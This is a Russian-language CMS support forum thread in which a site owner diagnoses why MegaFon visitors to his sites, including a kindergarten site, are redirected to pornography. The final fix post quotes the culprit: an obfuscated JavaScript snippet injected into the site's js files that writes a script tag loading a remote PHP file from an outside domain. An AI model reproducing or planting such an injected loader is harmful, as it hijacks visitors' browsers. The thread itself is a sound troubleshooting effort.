Проблемы с мегафон

ЕСТЬ РЕШЕНИЕ ЗАКРЫТО

Проблема именно с мегафон интернет провайдером

#1 22 января 2015 в 08:05
Здравствуйте Уважаемые пользователи ИнстантCMS !!!
Возникла следующая и очень серьезная проблема, а именно с мегафон интернет провайдером.
Именно этот интернет провайдер всех посетителей моих сайтов отправляет на мобильное порно.
Сайты находятся на домена www.magseti.ru и поддоменах например один из них www.pcn.magseti.ru
расположены на одном хостинге. Мегафон уверяют, что нет никаких ошибок у них всё в порядке, на хостинге тоже самое не находят никаких вирусов. Может кто нибудь сталкивался с такой очень серьезной проблемой или знает как ее решить???
Помогите, Люди найти причину, будьте добры!
Да кстати на другом хостинге поддомены от www.magseti.ru работают в нормальном
режиме вот пример www.an.magseti.ru ни один провайдер не отправляет людей смотреть порно.
Всем огромное спасибо за внимание.
#2 22 января 2015 в 11:35
по одному снимайте "расширения" и левые скрипты, которые имеются и смотрите отсутствие которого снимает проблему.
Проблема вряд ли в самом мегафоне, а в том что какой то скрипт вставленные в код, умеет определять пользователя использующего этого провайдера и направляет его на платник
#3 22 января 2015 в 11:39
кстати др. Веб говорит что сайт находится в его базе вредоносных сайтов. online.us.drweb.com/...
#4 22 января 2015 в 11:53


кстати др. Веб говорит что сайт находится в его базе вредоносных сайтов. online.us.drweb.com/...

Нил

Да дело в том, что все сайты на аккаунте www.magseti.ru уходят на порно.
Даже создаю новый сайт на этом аккаунте и происходит тоже самое. вообще ничего не добавляю. никаких лишних ссылок. А всё началось с того что сделал одну воспитательницу детского сада администратором и она стала добавлять всякие файлы, а она пользователь мегафона. и ровно три дня как она про пользовалась ее стало выкидывать на мобильное порно. после этого мне стали писать очень много посетителей, Что Вы мол даете ссылку на порно сайт… я был в шоке полном, но представляете Да… и эта воспитатель сайт то у нее детский, там родители в шоке. В общем беда полная. я понимаю, что где сидит код какой то… но как его найти… Вот в чем проблема. А удалять это проще удалить весь Аккаунт Вот детский сайт www.vospitanie42.ru с редиректом на www.uroki.magseti.ru
#5 22 января 2015 в 11:53
Смотрите что у вас в .htaccess прописано.
#6 22 января 2015 в 11:58


кстати др. Веб говорит что сайт находится в его базе вредоносных сайтов. online.us.drweb.com/...

Нил

А что касается Доктор Веб так это самый проконченный вирусняк… в него забей любой нормальный сайт он скажет вредоносный. я им писал, и даже звонил по какой причине они выдают сайт вредоносный ??? они мне ответили напишите заявку мы уберем со списка вредоносных.
#7 22 января 2015 в 12:00


Смотрите что у вас в .htaccess прописано.

garry

AddDefaultCharset utf-8
Options -Indexes

RewriteEngine On
RewriteBase /
RewriteRule ^.htaccess$ — [F]

RewriteCond %{REQUEST_URI} !\.(ico|css|js|txt)$ [NC]
RewriteCond %{REQUEST_FILENAME} !^/admin
RewriteCond %{REQUEST_FILENAME} !^/migrate
RewriteCond %{REQUEST_FILENAME} !^/install
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule ^(.*)$ /index.php [L]

Вот что там и так на всех сайтах…
#8 22 января 2015 в 12:08
Частенько когда просматриваешь правой кнопкой код и вверху над DOCTYPE пропущенные строки, есть всякая гадость которая туда подписывается при определенных условиях. Скорее всего в вашем случаи при мобильном трафе.

Иллюстрация

Надо искать что подписывает и откуда
#9 22 января 2015 в 12:10

в него забей любой нормальный сайт

Vladslav Li
не любой))
напрасно так реагируете, сами же видите этому подтверждение, например при заходе на сайте через мегафон…
#10 22 января 2015 в 12:13
скажите спасибо Вашим партнеркам, в которых все подряд вылазит.
Далее возможно ломанули хост и во все php файлы впихнули код закодированный в base64. Погуглите и все увидите.
#11 22 января 2015 в 13:12


скажите спасибо Вашим партнеркам, в которых все подряд вылазит.
Далее возможно ломанули хост и во все php файлы впихнули код закодированный в base64. Погуглите и все увидите.

kirkr

Партнеркам, говорю спасибо правда не всем, но я считаю у меня нормальные партнерки и от них проблем точно нет, они здесь не причем.
При создании нового сайта заливаю на хостинг с аккаунтом www.magseti.ru ничего не добавляю никаких партнерок поменял шаб и все вот пример www.alla.magseti.ru и происходит тоже самое.
#12 22 января 2015 в 13:27
как пользователь юсб-модема мегафон вижу такое впервые, но потдверждаю, редирект есть
#13 30 января 2015 в 08:17
Всем Доброго время суток!
Вопрос решен с моей проблемой и всё благодаря Уважаемому мной Хорошильцеву Олегу если кто не знает, то этот человек работает в Сайт Строй так по моему если не ошибаюсь. Проблема была следующая каким то образом- процитирую всё как написал Олег с просьбой обратиться к сообществу.
почему в некоторые файлы js прописался код
//lmjdtVOTXIGZtAkiInzdlan
c=0;cx='Code';cv='wri';while(c<94)document[cv+'te'](String['fromChar'+cx]('=tdsjqu!tsd>#iuuq;00cvolbj.dmvc/sv0npevmft0npe`nfov0tubu/qiq#!uzqf>#ufyu0kbwbtdsjqu#?=0tdsjqu?'['char'+cx+'At'](c++)-1))
//kHWRsEaMQciVuEAPOz2Okuh
#14 6 февраля 2015 в 00:34
Проблема решена.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.